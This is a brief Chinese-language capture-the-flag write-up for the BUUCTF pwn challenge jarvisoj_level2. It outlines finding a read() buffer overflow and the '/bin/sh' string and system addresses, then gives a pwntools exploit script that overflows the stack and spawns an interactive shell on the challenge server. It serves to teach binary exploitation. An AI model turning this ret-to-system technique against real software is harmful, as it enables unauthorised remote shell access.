BUUCTF-PWN-jarvisoj_level2

共计 240 个字符，预计需要花费 1 分钟才能阅读完成。

提醒：本文最后更新于 2024-08-29 10:10，文中所关联的信息可能已发生改变，请知悉！

checksec

IDA

read是一个溢出点

查看字符串，发现有binsh

找到 binsh 地址

再找到 system 在text段的地址

EXP

from pwn import *

p = remote('node4.buuoj.cn', 29211)

payload = b'a' * (0x88 + 0x4) + p32(0x804845C) + p32(0x804A024)
p.sendlineafter('\n', payload)

p.interactive()

结果